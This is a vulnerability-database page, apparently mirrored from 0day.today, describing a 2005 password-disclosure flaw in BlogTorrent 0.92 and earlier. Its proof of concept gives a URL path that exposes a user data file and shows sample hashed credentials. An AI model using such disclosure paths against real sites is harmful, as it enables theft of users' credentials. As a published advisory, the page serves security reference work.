Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

BlogTorrent <= 0.92 Remote Password Disclosure Exploit

🗓️ 11 Jul 2005 00:00:00Reported by LazyCrsType 
zdt
 zdt🔗 0day.today👁 32 Views

Remote exploit for BlogTorrent revealing user passwords through insecure data paths.

Show more
Code
======================================================
BlogTorrent <= 0.92 Remote Password Disclosure Exploit
======================================================




# Edited for easy info. /str0ke

Software:    BlogTorrent 0.92 <=
Vendor:      http://www.blogtorrent.com/
Author:      LazyCrs && pjphem
Date:        10/07/2005
Type:        Remote/Local User Password Disclosure

#0x03 - POC

http://test/path_of_blog/data/newusers
=
d40:14ae696abdca1688dd577fe486c3981f331457b0d7:Createdi1120957648e5:Email17:[email protected]:Hash40:d7b82821fe725305bded2fab9e91ed1e0e6fd93bee

Username (crypt in md5) ->  14ae696abdca1688dd577fe486c3981f331457b0d7
Password  (crypt in md5) ->  d7b82821fe725305bded2fab9e91ed1e0e6fd93bee

#LazyCrs[AT]GMail[DOT]com - pjphem[AT]mybox[DOT]it
#FREE RAFA! FREE RAFA! FREE RAFA!



#  0day.today [2018-03-01]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
11 Jul 2005 00:00Current
7.1High risk
Vulners AI Score7.1
blogtorrent vulnerabilityremote password disclosureuser password securityinsecure data path
32
.json
Report